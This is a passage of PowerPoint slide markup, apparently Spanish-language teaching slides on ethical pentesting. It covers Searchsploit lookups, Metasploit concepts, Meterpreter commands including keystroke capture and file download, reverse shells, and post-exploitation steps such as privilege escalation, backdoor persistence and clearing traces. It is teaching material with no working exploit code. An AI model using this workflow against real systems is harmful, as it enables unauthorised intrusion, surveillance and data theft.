              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Muestra información del sistema operativo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Muestra el usuario actual. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Abre una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> de sistema (CMD en Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> en Linux). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>ruta_archivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>&gt;: Descarga un archivo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>ruta_archivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>&gt;: Sube un archivo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>keyscan_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>keyscan_dump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Captura las pulsaciones del teclado.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974607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9EFBA-E31B-823A-3ECC-A04AF820EE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0"/>
              <a:t>Consideraciones Avanzadas y Post-Explotación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Marcador de contenido 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B53E3D6C-5777-BBA0-C3EB-6AA8B22C2F57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0"/>
              <a:t>Escalada de Privilegios: Una vez dentro, el siguiente paso es obtener más privilegios, por ejemplo, convertirse en administrador. Usa módulos como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0" err="1"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0"/>
              <a:t>. Movimiento Lateral: Usa la máquina comprometida para atacar otros sistemas en la red interna. Persistencia: Establece una backdoor para mantener el acceso. Limpieza de Evidencia: En un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0" err="1"/>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2400" dirty="0"/>
              <a:t>, es vital borrar las huellas y restaurar el sistema a su estado original.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2723185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739299-3ADD-4B84-6A09-E42DFCE4347C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="609601"/>
            <a:ext cx="10131425" cy="656492"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0"/>
              <a:t>glosario</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E6DB3A6-83D1-3728-4DCF-3863FB61D616}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1204547"/>
            <a:ext cx="10131425" cy="4586654"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>La interfaz de línea de comandos principal de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>multihandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Un módulo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> que actúa como un oyente. Se utiliza para recibir las conexiones entrantes de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> que se ejecutan en otras máquinas (reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>shells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: La dirección IP de la máquina del atacante (local host). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>RHOSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: La dirección IP o rango de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> del objetivo (remote hosts). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> avanzado y muy versátil de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>. Es sigiloso, se ejecuta en la memoria de la víctima y ofrece una gran cantidad de funcionalidades. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>Reverse Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Una conexión en la que la máquina víctima inicia una conexión saliente a la máquina del atacante. Es muy efectiva para evadir firewalls que bloquean las conexiones entrantes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Un conjunto de instrucciones pequeñas y optimizadas que se ejecutan para abrir una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> de comandos en el sistema objetivo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Una herramienta independiente de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> utilizada para generar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> y codificar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76730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A6E42-CFAD-4935-FED8-9B9AF2CA1426}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="609600"/>
            <a:ext cx="10876084" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Del Reconocimiento a la Explotación: Usando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9C113C8-418E-13F6-869E-2D8482079B95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>Objetivo de la Clase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>En esta clase, tus estudiantes aprenderán a pasar de la fase de descubrimiento de vulnerabilidades a la fase de explotación de manera controlada y profesional. Se enfatizará el uso de herramientas especializadas para aprovechar los hallazgos de forma ética.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3270401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991DC-A64E-6220-F5AA-B68DD27FBA51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>La Biblioteca de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93F7B27B-24C4-8148-E527-8E0E0A0E23DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="11043137" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t>¿Qué es?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> Es una herramienta de línea de comandos que te permite buscar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> en la base de datos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t>-DB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> sin necesidad de conexión a internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t>Flujo de Trabajo: Encuentras la vulnerabilidad: (Ej. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> te dice que un servidor está corriendo "Apache Struts 2.3.1"). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t>Buscas el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t>: Usas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> con la versión del software vulnerable. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t>Comando: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> Apache Struts 2.3.1 Refinas la búsqueda: Si tienes el número de CVE, la búsqueda es más precisa. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t>Comando: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> CVE-2017-5638 Análisis de los resultados: Muestra el tipo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t> (local, remoto), el sistema operativo afectado y si existe un módulo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2036736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ECC511-9360-6F8B-AC41-046DC32771F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825909" y="808055"/>
            <a:ext cx="3979205" cy="1453363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-MX" sz="2500" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2500"/>
              <a:t> Framework: La Plataforma de Explotación</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A7A269-F347-C2E7-B720-CEAFAF1C1520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802178" y="2261420"/>
            <a:ext cx="4002936" cy="3637935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>¿Qué es? Un entorno que consolida miles de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t> y herramientas para la fase de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>post-explotación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>. Conceptos Clave: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>: El código que aprovecha la vulnerabilidad. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>: El código que se ejecuta en el sistema objetivo después de la explotación. (Ej. una reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>). Módulo: Los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>, y otras herramientas se llaman módulos en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="A step-by-step guide to the Metasploit Framework">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66E461D5-8CE9-1FD7-3172-E4BEBDA70EE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28845" y="1271273"/>
            <a:ext cx="7188888" cy="4690749"/>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304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50" name="Picture 2" descr="metasploit console commands cheatsheet">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ADDF00B-C656-53E9-6E58-8C7219FAA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 b="2627"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="20" y="975"/>
            <a:ext cx="7552924"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etasploit modules explained">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BB9895-C2F4-55A3-4B06-10D5815547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9673" y="-975"/>
            <a:ext cx="49228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928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BE4D69-8178-E26D-2D4E-F8BD2C3C1C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Estableciendo la Conexión (Reverse Shell)</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BEE536E-CF09-14CE-2A76-A70CDE6838A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="11271737" cy="3649133"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t>¿Qué es una Reverse Shell? Es una conexión que se establece desde la máquina víctima hacia la máquina del atacante. ¿Por qué se usa? La mayoría de los firewalls permiten conexiones salientes pero bloquean las entrantes. Una reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t> explota este hecho, haciendo que la máquina objetivo "llame" a la tuya. Pasos Teóricos: El atacante configura un "oyente" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t>). El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t> fuerza a la víctima a ejecutar un comando que se conecta al oyente. Se establece la conexión y el atacante obtiene una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2000" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3660361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7749B82-7093-FD53-FD4B-9DF170EF475B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
